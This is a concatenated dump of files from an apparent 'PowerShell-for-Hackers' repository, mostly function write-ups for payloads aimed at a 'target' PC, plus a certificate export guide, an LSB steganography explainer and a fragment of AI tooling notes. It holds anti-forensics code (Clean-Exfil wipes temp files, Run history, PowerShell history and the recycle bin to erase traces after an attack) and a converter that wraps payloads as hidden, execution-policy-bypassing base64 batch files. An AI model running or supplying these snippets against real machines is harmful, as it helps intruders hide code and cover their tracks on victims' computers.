30 | - [Secure Transfer](#secure-transfer) 31 | - [Importing Certificates](#importing-certificates) 32 | - [Security Considerations](#security-considerations) 33 | 34 | ## Exporting Certificates 35 | 36 | ### Steps to Export 37 | 38 | 1. **Open Certificate Manager**: Run `certmgr.msc`. 39 | 2. **Find Your Certificate**: Go to `Personal` -> `Certificates`. 40 | 3. **Export with Private Key**: Right-click the certificate, choose `All Tasks`, and then `Export...`. Include the private key. 41 | 4. **Set a Password**: Protect the private key with a strong password. 42 | 5. **Choose File Format**: Export as a PFX (.pfx) file. 43 | 6. **Save the Certificate**: Choose a secure location on your computer. 44 | 45 | ## Secure Transfer 46 | 47 | ### Guidelines for Transfer 48 | 49 | - **Method of Transfer**: Use encrypted email, secure file transfer services, or physical devices like USB drives. 50 | - **Password Transmission**: Send the password through a different channel for added security. 51 | 52 | ## Importing Certificates 53 | 54 | ### Steps to Import 55 | 56 | 1. **Open Certificate Manager**: On the recipient's computer, run `certmgr.msc`. 57 | 2. **Import Certificate**: Go to `Personal` -> `Certificates`, right-click, choose `All Tasks`, and then `Import...`. 58 | 3. **Locate the PFX File**: Select the transferred PFX file. 59 | 4. **Enter Password**: Provide the password set during the export process. 60 | 5. **Complete the Import**: Follow the wizard to add the certificate to the store. 61 | 62 | ## Security Considerations 63 | 64 | - **Handle Private Keys Carefully**: Private keys are critical for security. Keep them confidential. 65 | - **Trust**: Only share certificates with trusted individuals or entities. 66 | - **Compliance**: Adhere to organizational and legal policies for handling certificates. 67 | 68 | --- 69 | *This guide is intended for informational purposes and does not constitute professional security advice.* 70 | -------------------------------------------------------------------------------- /VideoNotes/Convert-ImageToAscii.ps1: -------------------------------------------------------------------------------- 1 | function Convert-ImageToAscii { 2 | [CmdletBinding(DefaultParameterSetName = 'AutoSize')] 3 | param ( 4 | [Parameter(Mandatory = $true)] 5 | [string] $InFile, 6 | 7 | [Parameter(Mandatory = $false, ParameterSetName = 'CustomSize')] 8 | [int] $Width, 9 | 10 | [Parameter(Mandatory = $false, ParameterSetName = 'CustomSize')] 11 | [int] $Height, 12 | 13 | [Parameter(Mandatory = $false)] 14 | [switch] $Invert 15 | ) 16 | 17 | begin { 18 | $tempFile = "$PSScriptRoot\temp.jpg" 19 | [void][System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") 20 | 21 | $img = [System.Drawing.Image]::FromFile((Get-Item $InFile)) 22 | 23 | if ($PSCmdlet.ParameterSetName -eq 'AutoSize') { 24 | [int]$Height = $Host.UI.RawUI.WindowSize.Height * ($img.Size.Width / $img.Size.Height) 25 | [int]$Width = $Height * ($img.Size.Width / $img.Size.Height) 26 | } else { 27 | if ($null -eq $Height -or $Height -eq 0) { 28 | [int]$Height = $Width * ($img.Size.Height / $img.Size.Width) 29 | } elseif ($null -eq $Width -or $Width -eq 0) { 30 | [int]$Width = $Height * ($img.Size.Width / $img.Size.Height) 31 | } 32 | } 33 | } 34 | 35 | process { 36 | $bmp = New-Object System.Drawing.Bitmap($Width, $Height) 37 | 38 | $graph = [System.Drawing.Graphics]::FromImage($bmp) 39 | $graph.DrawImage($img, 0, 0, $Width, $Height) 40 | 41 | $graph.Dispose() 42 | $img.Dispose() 43 | 44 | if ($Invert) { 45 | $symbols = " .,:~+t?xmoX#M%@" 46 | } else { 47 | $symbols = "@%M#Xomx?t+~:,. " 48 | } 49 | $res = "" 50 | 51 | foreach ($h in 1..$bmp.Height) { 52 | foreach ($w in 1..$bmp.Width) { 53 | $px = $bmp.GetPixel($w - 1, $h - 1) 54 | $brightness = (0.2126 * $px.R + 0.7152 * $px.G + 0.0722 * $px.B) 55 | 56 | if ($brightness -le 15) { $res += $symbols[0] + " " } 57 | elseif ($brightness -le 31) { $res += $symbols[1] + " " } 58 | elseif ($brightness -le 47) { $res += $symbols[2] + " " } 59 | elseif ($brightness -le 63) { $res += $symbols[3] + " " } 60 | elseif ($brightness -le 79) { $res += $symbols[4] + " " } 61 | elseif ($brightness -le 95) { $res += $symbols[5] + " " } 62 | elseif ($brightness -le 111) { $res += $symbols[6] + " " } 63 | elseif ($brightness -le 127) { $res += $symbols[7] + " " } 64 | elseif ($brightness -le 143) { $res += $symbols[8] + " " } 65 | elseif ($brightness -le 159) { $res += $symbols[9] + " " } 66 | elseif ($brightness -le 175) { $res += $symbols[10] + " " } 67 | elseif ($brightness -le 191) { $res += $symbols[11] + " " } 68 | elseif ($brightness -le 207) { $res += $symbols[12] + " " } 69 | elseif ($brightness -le 223) { $res += $symbols[13] + " " } 70 | elseif ($brightness -le 249) { $res += $symbols[14] + " " } 71 | else { $res += $symbols[15] + " " } 72 | 73 | } 74 | $res += "`n" 75 | } 76 | } 77 | 78 | end { 79 | $BitMap.Dispose() 80 | Remove-Item $tempFile -Force 81 | 82 | $res 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /Functions/PlaySound.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # PlaySound 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | Play a sound file from the console window 27 | 28 | ## The Function 29 | 30 | ### [PlaySound] 31 | 32 | Pass the path of the sound file into this function to have it play using the following syntax: 33 | ``` 34 | PlaySound "C:\Users\User\AppData\Local\Temp\sound.wav" 35 | ``` 36 | 37 | ``` 38 | function PlaySound { 39 | [CmdletBinding()] 40 | param ( 41 | [Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)] 42 | [string]$File 43 | ) 44 | $PlaySound=New-Object System.Media.SoundPlayer;$PlaySound.SoundLocation=$File;$PlaySound.playsync() 45 | } 46 | ``` 47 | 48 |

(back to top)

49 | 50 | 51 | ## Examples 52 | [//]: # (Examples of scripts that have used your function) 53 | Listed below are payloads that have used one of these functions: 54 | 55 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 56 | 57 | 58 |

(back to top)

59 | 60 | 61 | ## Contact 62 | 63 |

📱 My Socials 📱

64 |
65 | 66 | 67 | 73 | 79 | 85 | 91 | 92 |
68 | 69 | C# 70 | 71 |
YouTube 72 | 		74 | 75 | Python 76 | 77 |
Twitter 78 | 		80 | 81 | Golang 82 | 83 |
Instagram 84 | 		86 | 87 | Jsonnet 88 | 89 |
Discord 90 |
93 |
94 | 95 | 96 | 97 |

(back to top)

98 | 99 | 100 | ## Acknowledgments 101 | 102 | * [Hak5](https://hak5.org/) 103 | * [UberGuidoZ](https://github.com/UberGuidoZ) 104 | 105 | *** 106 | 107 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 108 | 109 |

(back to top)

110 | -------------------------------------------------------------------------------- /Functions/Speak.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Speak 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | Speaks through your targets speakers 27 | 28 | ## The Function 29 | 30 | ### [Speak] 31 | 32 | Using SAPI.SpVoice you will feed strings to the functions to have it speak through your targets speakers using the following syntax 33 | 34 | ``` 35 | speak "you have been hacked" 36 | 37 | ``` 38 | 39 | ``` 40 | function speak { 41 | 42 | [CmdletBinding()] 43 | param ( 44 | [Parameter (Position=0,Mandatory = $True,ValueFromPipeline=$true)] 45 | [string]$Sentence 46 | ) 47 | 48 | $s.Voice = $s.GetVoices().Item(0) 49 | $s=New-Object -ComObject SAPI.SpVoice 50 | $s.Rate = -2 51 | $s.Speak($Sentence) 52 | } 53 | ``` 54 | 55 |

(back to top)

56 | 57 | 58 | ## Examples 59 | 60 | Listed below are payloads that have used one of these functions: 61 | 62 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 63 | 64 | [We-Found-You](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-We-Found-You) 65 | 66 | 67 |

(back to top)

68 | 69 | 70 | ## Contact 71 | 72 |

📱 My Socials 📱

73 |
74 | 75 | 76 | 82 | 88 | 94 | 100 | 101 |
77 | 78 | C# 79 | 80 |
YouTube 81 | 		83 | 84 | Python 85 | 86 |
Twitter 87 | 		89 | 90 | Golang 91 | 92 |
Instagram 93 | 		95 | 96 | Jsonnet 97 | 98 |
Discord 99 |
102 |
103 | 104 | 105 | 106 |

(back to top)

107 | 108 | 109 | ## Acknowledgments 110 | 111 | * [Hak5](https://hak5.org/) 112 | * [UberGuidoZ](https://github.com/UberGuidoZ) 113 | 114 | *** 115 | 116 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 117 | 118 |

(back to top)

119 | -------------------------------------------------------------------------------- /Functions/Clean-Exfil.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Clean-Exfil 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function is to erase any trace of you after wreaking havok on your target 27 | 28 | ## The Function 29 | 30 | ### [Clean-Exfil] 31 | 32 | You will Delete contents of Temp folder, Delete run box history, Delete powershell history, and Deletes contents of recycle bin 33 | 34 | ``` 35 | function Clean-Exfil { 36 | 37 | # empty temp folder 38 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 39 | 40 | # delete run box history 41 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 42 | 43 | # Delete powershell history 44 | Remove-Item (Get-PSreadlineOption).HistorySavePath 45 | 46 | # Empty recycle bin 47 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue 48 | 49 | } 50 | ``` 51 | 52 |

(back to top)

53 | 54 | 55 | ## Examples 56 | 57 | Listed below are payloads that have used one of these functions: 58 | 59 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 60 | 61 | [ET-Phone-Home](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home) 62 | 63 | [AcidBurn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 64 | 65 | 66 |

(back to top)

67 | 68 | 69 | ## Contact 70 | 71 |

📱 My Socials 📱

72 |
73 | 74 | 75 | 81 | 87 | 93 | 99 | 100 |
76 | 77 | C# 78 | 79 |
YouTube 80 | 		82 | 83 | Python 84 | 85 |
Twitter 86 | 		88 | 89 | Golang 90 | 91 |
Instagram 92 | 		94 | 95 | Jsonnet 96 | 97 |
Discord 98 |
101 |
102 | 103 | 104 | 105 |

(back to top)

106 | 107 | 108 | ## Acknowledgments 109 | 110 | * [Hak5](https://hak5.org/) 111 | * [UberGuidoZ](https://github.com/UberGuidoZ) 112 | 113 | *** 114 | 115 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 116 | 117 |

(back to top)

118 | -------------------------------------------------------------------------------- /Functions/Hide-Msg.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Hide Message 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function can be used to hide a secret message in an image 27 | 28 | ## The Function 29 | 30 | ### [Hide-Msg] 31 | 32 | In this function you will provide the path of your image and your secret message using the syntax below 33 | 34 | ``` 35 | Hide-Msg -Path "C:\Users\user\Desktop\secret.jpg" -Message "this is your secret message" 36 | ``` 37 | 38 | ``` 39 | function Hide-Msg { 40 | 41 | [CmdletBinding()] 42 | param ( 43 | 44 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 45 | [string]$Path, 46 | 47 | [Parameter (Mandatory = $False)] 48 | [string]$Message 49 | ) 50 | 51 | echo "`n`n $Message" > $Env:USERPROFILE\Desktop\foo.txt 52 | 53 | cmd.exe /c copy /b "$Path" + "$Env:USERPROFILE\Desktop\foo.txt" "$Path" 54 | 55 | rm $Env:USERPROFILE\Desktop\foo.txt -r -Force -ErrorAction SilentlyContinue 56 | 57 | } 58 | ``` 59 | 60 |

(back to top)

61 | 62 | 63 | ## Examples 64 | 65 | Listed below are payloads that have used one of these functions: 66 | 67 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 68 | 69 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 70 | 71 | 72 |

(back to top)

73 | 74 | 75 | ## Contact 76 | 77 |

📱 My Socials 📱

78 |
79 | 80 | 81 | 87 | 93 | 99 | 105 | 106 |
82 | 83 | C# 84 | 85 |
YouTube 86 | 		88 | 89 | Python 90 | 91 |
Twitter 92 | 		94 | 95 | Golang 96 | 97 |
Instagram 98 | 		100 | 101 | Jsonnet 102 | 103 |
Discord 104 |
107 |
108 | 109 | 110 | 111 |

(back to top)

112 | 113 | 114 | ## Acknowledgments 115 | 116 | * [Hak5](https://hak5.org/) 117 | * [UberGuidoZ](https://github.com/UberGuidoZ) 118 | 119 | *** 120 | 121 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 122 | 123 |

(back to top)

124 | -------------------------------------------------------------------------------- /VideoNotes/lsbSteggo.md: -------------------------------------------------------------------------------- 1 | # Least Significant Bit (LSB) Manipulation in Steganography 2 | 3 | ## Overview 4 | Least Significant Bit (LSB) manipulation is a steganography technique used to hide information within digital images. It leverages the principle that minor changes in pixel values are usually imperceptible to the human eye. 5 | 6 | ## Understanding Pixels and Binary Representation 7 | 8 | ### Pixel Composition 9 | - **Color Channels**: Each pixel in a color image is composed of color channels – Red, Green, and Blue (RGB). 10 | - **Bit Depth**: Commonly, each channel is represented by 8 bits, resulting in 24 bits per pixel. 11 | 12 | ### Significance of Bits 13 | - **MSB vs. LSB**: In an 8-bit value, the Most Significant Bit (MSB) holds the highest value, whereas the Least Significant Bit (LSB) has the lowest. 14 | - **Influence on Color**: Altering the MSB changes the color significantly, but changes to the LSB are subtle. 15 | 16 | ## The LSB Steganography Process 17 | 18 | ### Data Preparation 19 | 1. **Binary Conversion**: Convert the data to be hidden into binary format. 20 | 2. **Pixel Selection**: Choose pixels in the image to store the data. 21 | 22 | ### Embedding Process 23 | 1. **Replacing LSBs**: Replace the LSB of each selected pixel's color value with a bit from the binary data. 24 | 2. **Sequential Embedding**: Follow a predetermined sequence to embed data bits across the image's pixels. 25 | 3. **Channel Variation**: Optionally vary which color channel's LSB is altered to enhance complexity. 26 | 27 | ### Extracting Process 28 | 1. **Identifying Pixels**: Locate the pixels used for data embedding. 29 | 2. **Reading LSBs**: Extract the LSB from each relevant pixel to reconstruct the binary data. 30 | 3. **Binary to Data**: Convert the binary sequence back to its original format (text, image, etc.). 31 | 32 | ## Example Scenario 33 | 34 | ### Embedding "Hello" 35 | 1. **ASCII Conversion**: Convert "Hello" to binary (ASCII). 36 | 2. **Image Selection**: Choose an image with sufficient pixels. 37 | 3. **Embedding**: Replace LSBs of pixels with binary data of "Hello". 38 | 4. **Saving**: Store the modified image. 39 | 40 | ### Extraction 41 | 1. **Identify Pixels**: Know which pixels were used. 42 | 2. **Extract LSBs**: Read LSBs in sequence to get the binary data. 43 | 3. **Decode**: Convert binary back to text. 44 | 45 | ## Technical Considerations 46 | 47 | ### Image Formats 48 | - **Lossless Formats**: Prefer formats like PNG or BMP for their non-altering nature. 49 | - **Avoiding Lossy Formats**: Formats like JPEG can corrupt the hidden data due to compression. 50 | 51 | ### Capacity and Limitations 52 | - **Data Size**: Limited by the number of pixels in the image. 53 | - **Image Size**: Larger images can conceal more data. 54 | 55 | ### Robustness and Vulnerability 56 | - **Manipulation Susceptibility**: Vulnerable to image alterations like cropping or resizing. 57 | - **Format Conversion**: Changing the format can disrupt the hidden data. 58 | 59 | ## Detection and Analysis 60 | 61 | ### Visual Detection 62 | - **Human Eye Limitation**: Difficult to detect changes with the naked eye. 63 | 64 | ### Statistical Analysis 65 | - **Detecting Anomalies**: Statistical tools can reveal irregularities in pixel value distributions. 66 | 67 | ## Scripting for LSB Steganography 68 | 69 | ### Required Understanding 70 | - **Image Encoding**: Knowledge of how images are encoded in binary. 71 | - **Binary Manipulation**: Skills in handling binary data. 72 | - **Image Processing Libraries**: Familiarity with libraries like PIL in Python. 73 | 74 | ### Script Components 75 | 1. **Image Reading**: Open and read pixel values. 76 | 2. **Data Embedding**: Alter LSBs according to the secret data. 77 | 3. **Image Saving**: Store the modified image. 78 | 79 | ## Conclusion 80 | LSB manipulation in steganography is a nuanced technique requiring an understanding of image processing and binary data manipulation. While it's effective for covert information hiding, it demands careful consideration of image formats, data capacity, and potential vulnerabilities. 81 | -------------------------------------------------------------------------------- /Functions/PowerShell-2-Batch.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # PowerShell-2-Batch 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function will convert a PowerShell script to a Batch file 27 | 28 | ## The Function 29 | 30 | ### [PowerShell-2-Batch] 31 | 32 | Using this function will convert your powershell payload over to Base64 and then change the extension on it to be a .BAT file 33 | Make the conversion with this function using the following syntax: 34 | 35 | ``` 36 | P2B -Path "C:\Users\User\Desktop\example.ps1" 37 | 38 | or 39 | 40 | "C:\Users\User\Desktop\example.ps1" | P2B 41 | ``` 42 | 43 | ``` 44 | function P2B { 45 | param 46 | ( 47 | [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] 48 | [string] 49 | $Path 50 | ) 51 | 52 | process 53 | { 54 | $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $Path -Raw -Encoding UTF8))) 55 | $newPath = [Io.Path]::ChangeExtension($Path, ".bat") 56 | "@echo off`npowershell -w h -NoP -NonI -Exec Bypass -enc $encoded" | Set-Content -Path $newPath -Encoding Ascii 57 | } 58 | } 59 | ``` 60 | 61 |

(back to top)

62 | 63 | 64 | ## Examples 65 | 66 | Listed below are payloads that have used one of these functions: 67 | 68 | No payloads have made use of this function yet, please feel free to contact me to get your payload featured here if you do use it 69 | 70 | 71 |

(back to top)

72 | 73 | 74 | ## Contact 75 | 76 |

📱 My Socials 📱

77 |
78 | 79 | 80 | 86 | 92 | 98 | 104 | 105 |
81 | 82 | C# 83 | 84 |
YouTube 85 | 		87 | 88 | Python 89 | 90 |
Twitter 91 | 		93 | 94 | Golang 95 | 96 |
Instagram 97 | 		99 | 100 | Jsonnet 101 | 102 |
Discord 103 |
106 |
107 | 108 | 109 | 110 |

(back to top)

111 | 112 | 113 | ## Acknowledgments 114 | 115 | * [Hak5](https://hak5.org/) 116 | * [UberGuidoZ](https://github.com/UberGuidoZ) 117 | 118 | *** 119 | 120 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 121 | 122 |

(back to top)

123 | -------------------------------------------------------------------------------- /Functions/Set-Volume.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Set Volume 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function can be used to set the volume of your targets PC 27 | 28 | ## The Function 29 | 30 | ### [Set-Volume] 31 | 32 | In this function we will create an object to allow us to use the Send Keys method to either raise or lower the volume using the following syntax 33 | ``` 34 | Set-Volume 50 35 | ``` 36 | 37 | ``` 38 | Function Set-Volume 39 | { 40 | Param( 41 | [Parameter(Mandatory=$true)] 42 | [ValidateRange(0,100)] 43 | [Int] 44 | $volume 45 | ) 46 | 47 | # Calculate number of key presses. 48 | $keyPresses = [Math]::Ceiling( $volume / 2 ) 49 | 50 | # Create the Windows Shell object. 51 | $obj = New-Object -ComObject WScript.Shell 52 | 53 | # Set volume to zero. 54 | 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) } 55 | 56 | # Set volume to specified level. 57 | for( $i = 0; $i -lt $keyPresses; $i++ ) 58 | { 59 | $obj.SendKeys( [char] 175 ) 60 | } 61 | } 62 | ``` 63 | 64 |

(back to top)

65 | 66 | 67 | ## Examples 68 | 69 | Listed below are payloads that have used one of these functions: 70 | 71 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 72 | 73 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 74 | 75 | 76 |

(back to top)

77 | 78 | 79 | ## Contact 80 | 81 |

📱 My Socials 📱

82 |
83 | 84 | 85 | 91 | 97 | 103 | 109 | 110 |
86 | 87 | C# 88 | 89 |
YouTube 90 | 		92 | 93 | Python 94 | 95 |
Twitter 96 | 		98 | 99 | Golang 100 | 101 |
Instagram 102 | 		104 | 105 | Jsonnet 106 | 107 |
Discord 108 |
111 |
112 | 113 | 114 | 115 |

(back to top)

116 | 117 | 118 | ## Acknowledgments 119 | 120 | * [Hak5](https://hak5.org/) 121 | * [UberGuidoZ](https://github.com/UberGuidoZ) 122 | 123 | *** 124 | 125 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 126 | 127 |

(back to top)

128 | -------------------------------------------------------------------------------- /Functions/If-Admin.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # If-Admin 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | These functions are used to determine if you have Admin level privledges 27 | 28 | ## The Function 29 | 30 | ### [If-Admin-Window] 31 | 32 | This function will let you know if you are currently in an Admin Privledge Level window 33 | 34 | ``` 35 | function If-Admin-Window { 36 | $user = [Security.Principal.WindowsIdentity]::GetCurrent(); 37 | $isAdmin = (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 38 | 39 | if($isAdmin){ 40 | Write-host 'Is Admin Window' -BackgroundColor DarkRed -ForegroundColor White 41 | } 42 | else{ 43 | Write-host 'Not Admin Window' -BackgroundColor DarkBlue -ForegroundColor White 44 | } 45 | } 46 | ``` 47 | 48 | ### [If-Admin] 49 | 50 | This function will run the current user against LocalGroupMember to return True or False if Profile has Admin Privledges 51 | 52 | ``` 53 | function If-Admin { 54 | $user = "$env:COMPUTERNAME\$env:USERNAME" 55 | $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user 56 | if($isAdmin){ 57 | Write-host 'Is Admin' -BackgroundColor DarkRed -ForegroundColor White 58 | } 59 | else{ 60 | Write-host 'Not Admin' -BackgroundColor DarkBlue -ForegroundColor White 61 | } 62 | } 63 | ``` 64 | 65 |

(back to top)

66 | 67 | 68 | ## Examples 69 | 70 | Listed below are payloads that have used one of these functions: 71 | 72 | No current Examples to show. Please feel free to submit your own payload of you using this function 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Contact 79 | 80 |

📱 My Socials 📱

81 |
82 | 83 | 84 | 90 | 96 | 102 | 108 | 109 |
85 | 86 | C# 87 | 88 |
YouTube 89 | 		91 | 92 | Python 93 | 94 |
Twitter 95 | 		97 | 98 | Golang 99 | 100 |
Instagram 101 | 		103 | 104 | Jsonnet 105 | 106 |
Discord 107 |
110 |
111 | 112 | 113 | 114 |

(back to top)

115 | 116 | 117 | ## Acknowledgments 118 | 119 | * [Hak5](https://hak5.org/) 120 | * [UberGuidoZ](https://github.com/UberGuidoZ) 121 | 122 | *** 123 | 124 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 125 | 126 |

(back to top)

127 | -------------------------------------------------------------------------------- /Functions/MsgBox.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # MsgBox 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function will make a generic pop up message box 27 | 28 | ## The Function 29 | 30 | ### [MsgBox] 31 | 32 | The title, button, and image parameters are optional. 33 | 34 | You can use tab completion on the button and image parameter 35 | 36 | Generate a Message Box pop up using the following syntax: 37 | 38 | ``` 39 | MsgBox -message 'this is the message body' -title "this is the title" -button OKCancel -image Warning 40 | 41 | or 42 | 43 | MsgBox -m 'this is the message body' -t "this is the title" -b OKCancel -i Warning 44 | ``` 45 | 46 | ``` 47 | function MsgBox { 48 | 49 | [CmdletBinding()] 50 | param ( 51 | [Parameter (Mandatory = $True)] 52 | [Alias("m")] 53 | [string]$message, 54 | 55 | [Parameter (Mandatory = $False)] 56 | [Alias("t")] 57 | [string]$title, 58 | 59 | [Parameter (Mandatory = $False)] 60 | [Alias("b")] 61 | [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] 62 | [string]$button, 63 | 64 | [Parameter (Mandatory = $False)] 65 | [Alias("i")] 66 | [ValidateSet('None','Hand','Question','Warning','Asterisk')] 67 | [string]$image 68 | ) 69 | 70 | Add-Type -AssemblyName PresentationCore,PresentationFramework 71 | 72 | if (!$title) {$title = " "} 73 | if (!$button) {$button = "OK"} 74 | if (!$image) {$image = "None"} 75 | 76 | [System.Windows.MessageBox]::Show($message,$title,$button,$image) 77 | 78 | } 79 | ``` 80 | 81 |

(back to top)

82 | 83 | 84 | ## Examples 85 | [//]: # (Examples of scripts that have used your function) 86 | Listed below are payloads that have used one of these functions: 87 | 88 | None currently. Please feel free to submit a pull request and edit this line linking one of your payloads that have used this function. 89 | 90 | 91 |

(back to top)

92 | 93 | 94 | ## Contact 95 | 96 |

📱 My Socials 📱

97 |
98 | 99 | 100 | 106 | 112 | 118 | 124 | 125 |
101 | 102 | C# 103 | 104 |
YouTube 105 | 		107 | 108 | Python 109 | 110 |
Twitter 111 | 		113 | 114 | Golang 115 | 116 |
Instagram 117 | 		119 | 120 | Jsonnet 121 | 122 |
Discord 123 |
126 |
127 | 128 | 129 | 130 |

(back to top)

131 | 132 | 133 | ## Acknowledgments 134 | 135 | * [Hak5](https://hak5.org/) 136 | * [UberGuidoZ](https://github.com/UberGuidoZ) 137 | 138 | *** 139 | 140 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 141 | 142 |

(back to top)

143 | -------------------------------------------------------------------------------- /VideoNotes/ChatGPT-Powershell.md: -------------------------------------------------------------------------------- 1 | # Invoke-AIFunctionBuilder 2 | 3 | --- 4 | 5 | ## Usage 6 | 7 | https://user-images.githubusercontent.com/13159458/230610955-c37ad3e8-f12c-4802-83d5-20ed550f4a2c.mp4 8 | 9 | ### To launch the function builder interactively: 10 | ```pwsh 11 | Invoke-AIFunctionBuilder 12 | ``` 13 | ### To edit an existing function provide the text and a prompt that would be used to create it, the builder will correct any issues and validate it meets the prompt requirements: 14 | ```pwsh 15 | Invoke-AIFunctionBuilder -InitialFunction "function Say-Hello { Write-Host 'hello' }" -Prompt "Write a powershell function that will say hello" 16 | ``` 17 | 18 | ### The function builder is designed to run interactively so you can see the work the LLM is doing but if you want to you can run the function builder non-interactively with the `-NonInteractive` switch: 19 | ```pwsh 20 | "Write a powershell function that will list all available wifi networks" | Invoke-AIFunctionBuilder -NonInteractive 21 | ``` 22 | 23 | --- 24 | 25 | # Invoke-AIErrorHelper 26 | 27 | Invoke-AIErrorHelper is a function that uses the OpenAI GPT-3 